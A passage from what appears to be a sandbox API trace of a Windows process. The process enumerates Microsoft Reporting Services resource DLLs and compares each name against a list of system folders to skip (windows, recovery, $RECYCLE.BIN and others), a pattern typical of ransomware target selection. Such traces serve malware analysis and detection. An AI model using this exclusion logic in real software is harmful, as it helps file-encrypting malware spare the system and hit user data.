lpUsedDefaultChar=0x0) returned 37 [0125.780] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.DataWarehouse.resources.dll", cchWideChar=37, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 37 [0125.780] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0125.780] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.DataWarehouse.resources.dll", cchWideChar=37, lpMultiByteStr=0x22cdc8, cbMultiByte=37, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.DataWarehouse.resources.dll", lpUsedDefaultChar=0x0) returned 37 [0125.780] FindNextFileW (in: hFindFile=0x231d00, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf6223b13, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf6223b13, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf6296213, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x49aa8, dwReserved0=0x60002, dwReserved1=0x236ace, cFileName="Microsoft.Office.PowerPivot.ExcelAddIn.resources.dll", cAlternateFileName="MICROS~4.DLL")) returned 1 [0125.780] lstrcmpiW (lpString1="Microsoft.Office.PowerPivot.ExcelAddIn.resources.dll", lpString2=".") returned 1 [0125.780] lstrcmpiW (lpString1="Microsoft.Office.PowerPivot.ExcelAddIn.resources.dll", lpString2="..") returned 1 [0125.780] lstrcmpiW (lpString1="Microsoft.Office.PowerPivot.ExcelAddIn.resources.dll", lpString2="...") returned 1 [0125.780] lstrcmpiW (lpString1="Microsoft.Office.PowerPivot.ExcelAddIn.resources.dll", lpString2="windows") returned -1 [0125.780] lstrcmpiW (lpString1="Microsoft.Office.PowerPivot.ExcelAddIn.resources.dll", lpString2="recovery") returned -1 [0125.780] lstrcmpiW (lpString1="Microsoft.Office.PowerPivot.ExcelAddIn.resources.dll", lpString2="perflogs") returned -1 [0125.781] lstrcmpiW (lpString1="Microsoft.Office.PowerPivot.ExcelAddIn.resources.dll", lpString2="documents and settings") returned 1 [0125.781] lstrcmpiW (lpString1="Microsoft.Office.PowerPivot.ExcelAddIn.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0125.781] lstrcmpiW (lpString1="Microsoft.Office.PowerPivot.ExcelAddIn.resources.dll", lpString2="system volume information") returned -1 [0125.781] lstrcmpiW (lpString1="Microsoft.Office.PowerPivot.ExcelAddIn.resources.dll", lpString2="msocache") returned -1 [0125.781] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209710 [0125.781] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Office.PowerPivot.ExcelAddIn.resources.dll", cchWideChar=52, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 52 [0125.781] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0125.781] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Office.PowerPivot.ExcelAddIn.resources.dll", cchWideChar=52, lpMultiByteStr=0x20dde8, cbMultiByte=52, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.Office.PowerPivot.ExcelAddIn.resources.dll", lpUsedDefaultChar=0x0) returned 52 [0125.781] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Office.PowerPivot.ExcelAddIn.resources.dll", cchWideChar=52, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 52 [0125.781] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d920 [0125.781] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Office.PowerPivot.ExcelAddIn.resources.dll", cchWideChar=52, lpMultiByteStr=0x20d920, cbMultiByte=52, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.Office.PowerPivot.ExcelAddIn.resources.dll", lpUsedDefaultChar=0x0) returned 52 [0125.781] FindNextFileW (in: hFindFile=0x231d00, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xfbd422, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xfbd422, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1698075, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x8078, dwReserved0=0x60002, dwReserved1=0x236ace, cFileName="Microsoft.ReportingServices.DataExtensions.resources.dll", cAlternateFileName="MI1341~1.DLL")) returned 1 [0125.781] lstrcmpiW (lpString1="Microsoft.ReportingServices.DataExtensions.resources.dll", lpString2=".") returned 1 [0125.781] lstrcmpiW (lpString1="Microsoft.ReportingServices.DataExtensions.resources.dll", lpString2="..") returned 1 [0125.781] lstrcmpiW (lpString1="Microsoft.ReportingServices.DataExtensions.resources.dll", lpString2="...") returned 1 [0125.781] lstrcmpiW (lpString1="Microsoft.ReportingServices.DataExtensions.resources.dll", lpString2="windows") returned -1 [0125.781] lstrcmpiW (lpString1="Microsoft.ReportingServices.DataExtensions.resources.dll", lpString2="recovery") returned -1 [0125.781] lstrcmpiW (lpString1="Microsoft.ReportingServices.DataExtensions.resources.dll", lpString2="perflogs") returned -1 [0125.781] lstrcmpiW (lpString1="Microsoft.ReportingServices.DataExtensions.resources.dll", lpString2="documents and settings") returned 1 [0125.781] lstrcmpiW (lpString1="Microsoft.ReportingServices.DataExtensions.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0125.781] lstrcmpiW (lpString1="Microsoft.ReportingServices.DataExtensions.resources.dll", lpString2="system volume information") returned -1 [0125.781] lstrcmpiW (lpString1="Microsoft.ReportingServices.DataExtensions.resources.dll", lpString2="msocache") returned -1 [0125.781] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224dd8 [0125.781] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.DataExtensions.resources.dll", cchWideChar=56, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 56 [0125.781] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dba8 [0125.781] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.DataExtensions.resources.dll", cchWideChar=56, lpMultiByteStr=0x20dba8, cbMultiByte=56, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.DataExtensions.resources.dll", lpUsedDefaultChar=0x0) returned 56 [0125.781] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.DataExtensions.resources.dll", cchWideChar=56, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 56 [0125.781] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d920 [0125.781] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.DataExtensions.resources.dll", cchWideChar=56, lpMultiByteStr=0x20d920, cbMultiByte=56, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.DataExtensions.resources.dll", lpUsedDefaultChar=0x0) returned 56 [0125.781] FindNextFileW (in: hFindFile=0x231d00, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x56d17f1, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x56d17f1, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x56d17f1, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x15ac0, dwReserved0=0x60002, dwReserved1=0x236ace, cFileName="Microsoft.ReportingServices.Diagnostics.resources.dll", cAlternateFileName="MI2EA0~1.DLL")) returned 1 [0125.781] lstrcmpiW (lpString1="Microsoft.ReportingServices.Diagnostics.resources.dll", lpString2=".") returned 1 [0125.782] lstrcmpiW (lpString1="Microsoft.ReportingServices.Diagnostics.resources.dll", lpString2="..") returned 1 [0125.782] lstrcmpiW (lpString1="Microsoft.ReportingServices.Diagnostics.resources.dll", lpString2="...") returned 1 [0125.782] lstrcmpiW (lpString1="Microsoft.ReportingServices.Diagnostics.resources.dll", lpString2="windows") returned -1 [0125.782] lstrcmpiW (lpString1="Microsoft.ReportingServices.Diagnostics.resources.dll", lpString2="recovery") returned -1 [0125.782] lstrcmpiW (lpString1="Microsoft.ReportingServices.Diagnostics.resources.dll", lpString2="perflogs") returned -1 [0125.782] lstrcmpiW (lpString1="Microsoft.ReportingServices.Diagnostics.resources.dll", lpString2="documents and settings") returned 1 [0125.782] lstrcmpiW (lpString1="Microsoft.ReportingServices.Diagnostics.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0125.782] lstrcmpiW (lpString1="Microsoft.ReportingServices.Diagnostics.resources.dll", lpString2="system volume information") returned -1 [0125.782] lstrcmpiW (lpString1="Microsoft.ReportingServices.Diagnostics.resources.dll", lpString2="msocache") returned -1 [0125.782] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209530 [0125.782] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.Diagnostics.resources.dll", cchWideChar=53, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 53 [0125.782] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0125.782] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.Diagnostics.resources.dll", cchWideChar=53, lpMultiByteStr=0x20dde8, cbMultiByte=53, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.Diagnostics.resources.dll", lpUsedDefaultChar=0x0) returned 53 [0125.782] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.Diagnostics.resources.dll", cchWideChar=53, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 53 [0125.782] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d578 [0125.782] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.Diagnostics.resources.dll", cchWideChar=53, lpMultiByteStr=0x20d578, cbMultiByte=53, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.Diagnostics.resources.dll", lpUsedDefaultChar=0x0) returned 53 [0125.782] FindNextFileW (in: hFindFile=0x231d00, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x386b77a, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x386b77a, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x386b77a, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1b040, dwReserved0=0x60002, dwReserved1=0x236ace, cFileName="Microsoft.ReportingServices.QueryDesigners.Common.resources.dll", cAlternateFileName="MIC811~1.DLL")) returned 1 [0125.782] lstrcmpiW (lpString1="Microsoft.ReportingServices.QueryDesigners.Common.resources.dll", lpString2=".") returned 1 [0125.782] lstrcmpiW (lpString1="Microsoft.ReportingServices.QueryDesigners.Common.resources.dll", lpString2="..") returned 1 [0125.782] lstrcmpiW (lpString1="Microsoft.ReportingServices.QueryDesigners.Common.resources.dll", lpString2="...") returned 1 [0125.782] lstrcmpiW (lpString1="Microsoft.ReportingServices.QueryDesigners.Common.resources.dll", lpString2="windows") returned -1 [0125.782] lstrcmpiW (lpString1="Microsoft.ReportingServices.QueryDesigners.Common.resources.dll", lpString2="recovery") returned -1 [0125.782] lstrcmpiW (lpString1="Microsoft.ReportingServices.QueryDesigners.Common.resources.dll", lpString2="perflogs") returned -1 [0125.782] lstrcmpiW (lpString1="Microsoft.ReportingServices.QueryDesigners.Common.resources.dll", lpString2="documents and settings") returned 1 [0125.782] lstrcmpiW (lpString1="Microsoft.ReportingServices.QueryDesigners.Common.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0125.782] lstrcmpiW (lpString1="Microsoft.ReportingServices.QueryDesigners.Common.resources.dll", lpString2="system volume information") returned -1 [0125.782] lstrcmpiW (lpString1="Microsoft.ReportingServices.QueryDesigners.Common.resources.dll", lpString2="msocache") returned -1 [0125.782] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225080 [0125.782] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.QueryDesigners.Common.resources.dll", cchWideChar=63, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 63 [0125.782] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dba8 [0125.782] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.QueryDesigners.Common.resources.dll", cchWideChar=63, lpMultiByteStr=0x20dba8, cbMultiByte=63, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.QueryDesigners.Common.resources.dll", lpUsedDefaultChar=0x0) returned 63 [0125.782] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.QueryDesigners.Common.resources.dll", cchWideChar=63, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 63 [0125.782] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0125.783] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.QueryDesigners.Common.resources.dll", cchWideChar=63, lpMultiByteStr=0x20dde8, cbMultiByte=63, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.QueryDesigners.Common.resources.dll", lpUsedDefaultChar=0x0) returned 63 [0125.783] FindNextFileW (in: hFindFile=0x231d00, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xfc3e44f2, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xfc3e44f2, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xfc3e44f2, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x73ac8, dwReserved0=0x60002, dwReserved1=0x236ace, cFileName="Microsoft.ReportingServices.QueryDesigners.resources.dll", cAlternateFileName="MI63FB~1.DLL")) returned 1 [0125.783] lstrcmpiW (lpString1="Microsoft.ReportingServices.QueryDesigners.resources.dll", lpString2=".") returned 1 [0125.783] lstrcmpiW (lpString1="Microsoft.ReportingServices.QueryDesigners.resources.dll", lpString2="..") returned 1 [0125.783] lstrcmpiW (lpString1="Microsoft.ReportingServices.QueryDesigners.resources.dll", lpString2="...") returned 1 [0125.783] lstrcmpiW (lpString1="Microsoft.ReportingServices.QueryDesigners.resources.dll", lpString2="windows") returned -1 [0125.783] lstrcmpiW (lpString1="Microsoft.ReportingServices.QueryDesigners.resources.dll", lpString2="recovery") returned -1 [0125.783] lstrcmpiW (lpString1="Microsoft.ReportingServices.QueryDesigners.resources.dll", lpString2="perflogs") returned -1 [0125.783] lstrcmpiW (lpString1="Microsoft.ReportingServices.QueryDesigners.resources.dll", lpString2="documents and settings") returned 1 [0125.783] lstrcmpiW (lpString1="Microsoft.ReportingServices.QueryDesigners.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0125.783] lstrcmpiW (lpString1="Microsoft.ReportingServices.QueryDesigners.resources.dll", lpString2="system volume information") returned -1 [0125.783] lstrcmpiW (lpString1="Microsoft.ReportingServices.QueryDesigners.resources.dll", lpString2="msocache") returned -1 [0125.783] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225768 [0125.783] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.QueryDesigners.resources.dll", cchWideChar=56, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 56 [0125.783] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0125.783] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.QueryDesigners.resources.dll", cchWideChar=56, lpMultiByteStr=0x20dde8, cbMultiByte=56, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.QueryDesigners.resources.dll", lpUsedDefaultChar=0x0) returned 56 [0125.783] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.QueryDesigners.resources.dll", cchWideChar=56, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 56 [0125.783] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dba8 [0125.783] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.QueryDesigners.resources.dll", cchWideChar=56, lpMultiByteStr=0x20dba8, cbMultiByte=56, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.QueryDesigners.resources.dll", lpUsedDefaultChar=0x0) returned 56 [0125.783] FindNextFileW (in: hFindFile=0x231d00, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf483611a, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf483611a, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf4a25fae, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x15ac8, dwReserved0=0x60002, dwReserved1=0x236ace, cFileName="Microsoft.ReportingServices.ReportDesign.Common.resources.dll", cAlternateFileName="MICROS~3.DLL")) returned 1 [0125.783] lstrcmpiW (lpString1="Microsoft.ReportingServices.ReportDesign.Common.resources.dll", lpString2=".") returned 1 [0125.783] lstrcmpiW (lpString1="Microsoft.ReportingServices.ReportDesign.Common.resources.dll", lpString2="..") returned 1 [0125.783] lstrcmpiW (lpString1="Microsoft.ReportingServices.ReportDesign.Common.resources.dll", lpString2="...") returned 1 [0125.783] lstrcmpiW (lpString1="Microsoft.ReportingServices.ReportDesign.Common.resources.dll", lpString2="windows") returned -1 [0125.783] lstrcmpiW (lpString1="Microsoft.ReportingServices.ReportDesign.Common.resources.dll", lpString2="recovery") returned -1 [0125.783] lstrcmpiW (lpString1="Microsoft.ReportingServices.ReportDesign.Common.resources.dll", lpString2="perflogs") returned -1 [0125.783] lstrcmpiW (lpString1="Microsoft.ReportingServices.ReportDesign.Common.resources.dll", lpString2="documents and settings") returned 1 [0125.783] lstrcmpiW (lpString1="Microsoft.ReportingServices.ReportDesign.Common.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0125.783] lstrcmpiW (lpString1="Microsoft.ReportingServices.ReportDesign.Common.resources.dll", lpString2="system volume information") returned -1 [0125.783] lstrcmpiW (lpString1="Microsoft.ReportingServices.ReportDesign.Common.resources.dll", lpString2="msocache") returned -1 [0125.783] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x2256e0 [0125.783] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.ReportDesign.Common.resources.dll", cchWideChar=61, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0125.784] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d920 [0125.784] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.ReportDesign.Common.resources.dll", cchWideChar=61, lpMultiByteStr=0x20d920, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.ReportDesign.Common.resources.dll", lpUsedDefaultChar=0x0) returned 61 [0125.784] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.ReportDesign.Common.resources.dll", cchWideChar=61, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0125.784] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dba8 [0125.784] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.ReportDesign.Common.resources.dll", cchWideChar=61, lpMultiByteStr=0x20dba8, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.ReportDesign.Common.resources.dll", lpUsedDefaultChar=0x0) returned 61 [0125.784] FindNextFileW (in: hFindFile=0x231d00, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf45f9db0, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf45f9db0, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf45f9db0, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0xc068, dwReserved0=0x60002, dwReserved1=0x236ace, cFileName="Microsoft.ReportingServices.ReportDesign.Forms.resources.dll", cAlternateFileName="MICROS~2.DLL")) returned 1 [0125.784] lstrcmpiW (lpString1="Microsoft.ReportingServices.ReportDesign.Forms.resources.dll", lpString2=".") returned 1 [0125.784] lstrcmpiW (lpString1="Microsoft.ReportingServices.ReportDesign.Forms.resources.dll", lpString2="..") returned 1 [0125.784] lstrcmpiW (lpString1="Microsoft.ReportingServices.ReportDesign.Forms.resources.dll", lpString2="...") returned 1 [0125.784] lstrcmpiW (lpString1="Microsoft.ReportingServices.ReportDesign.Forms.resources.dll", lpString2="windows") returned -1 [0125.784] lstrcmpiW (lpString1="Microsoft.ReportingServices.ReportDesign.Forms.resources.dll", lpString2="recovery") returned -1 [0125.784] lstrcmpiW (lpString1="Microsoft.ReportingServices.ReportDesign.Forms.resources.dll", lpString2="perflogs") returned -1 [0125.784] lstrcmpiW (lpString1="Microsoft.ReportingServices.ReportDesign.Forms.resources.dll", lpString2="documents and settings") returned 1 [0125.784] lstrcmpiW (lpString1="Microsoft.ReportingServices.ReportDesign.Forms.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0125.784] lstrcmpiW (lpString1="Microsoft.ReportingServices.ReportDesign.Forms.resources.dll", lpString2="system volume information") returned -1 [0125.784] lstrcmpiW (lpString1="Microsoft.ReportingServices.ReportDesign.Forms.resources.dll", lpString2="msocache") returned -1 [0125.784] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225328 [0125.784] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.ReportDesign.Forms.resources.dll", cchWideChar=60, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 60 [0125.784] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dba8 [0125.784] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.ReportDesign.Forms.resources.dll", cchWideChar=60, lpMultiByteStr=0x20dba8, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.ReportDesign.Forms.resources.dll", lpUsedDefaultChar=0x0) returned 60 [0125.784] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.ReportDesign.Forms.resources.dll", cchWideChar=60, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 60 [0125.784] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0125.784] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.ReportDesign.Forms.resources.dll", cchWideChar=60, lpMultiByteStr=0x20dde8, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.ReportDesign.Forms.resources.dll", lpUsedDefaultChar=0x0) returned 60 [0125.784] FindNextFileW (in: hFindFile=0x231d00, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x18d43c7, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x18d43c7, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x18d43c7, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x3ce0, dwReserved0=0x60002, dwReserved1=0x236ace, cFileName="Microsoft.ReportingServices.RsClient.resources.dll", cAlternateFileName="MI5988~1.DLL")) returned 1 [0125.784] lstrcmpiW (lpString1="Microsoft.ReportingServices.RsClient.resources.dll", lpString2=".") returned 1 [0125.784] lstrcmpiW (lpString1="Microsoft.ReportingServices.RsClient.resources.dll", lpString2="..") returned 1 [0125.784] lstrcmpiW (lpString1="Microsoft.ReportingServices.RsClient.resources.dll", lpString2="...") returned 1 [0125.784] lstrcmpiW (lpString1="Microsoft.ReportingServices.RsClient.resources.dll", lpString2="windows") returned -1 [0125.784] lstrcmpiW (lpString1="Microsoft.ReportingServices.RsClient.resources.dll", lpString2="recovery") returned -1 [0125.784] lstrcmpiW (lpString1="Microsoft.ReportingServices.RsClient.resources.dll", lpString2="perflogs") returned -1 [0125.784] lstrcmpiW (lpString1="Microsoft.ReportingServices.RsClient.resources.dll", lpString2="documents and settings") returned 1 [0125.784] lstrcmpiW (lpString1="Microsoft.ReportingServices.RsClient.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0125.785] lstrcmpiW (lpString1="Microsoft.ReportingServices.RsClient.resources.dll", lpString2="system volume information") returned -1 [0125.785] lstrcmpiW (lpString1="Microsoft.ReportingServices.RsClient.resources.dll", lpString2="msocache") returned -1 [0125.785] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209710 [0125.785] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.RsClient.resources.dll", cchWideChar=50, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 50 [0125.785] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dba8 [0125.785] WideCharToMultiByte (in: 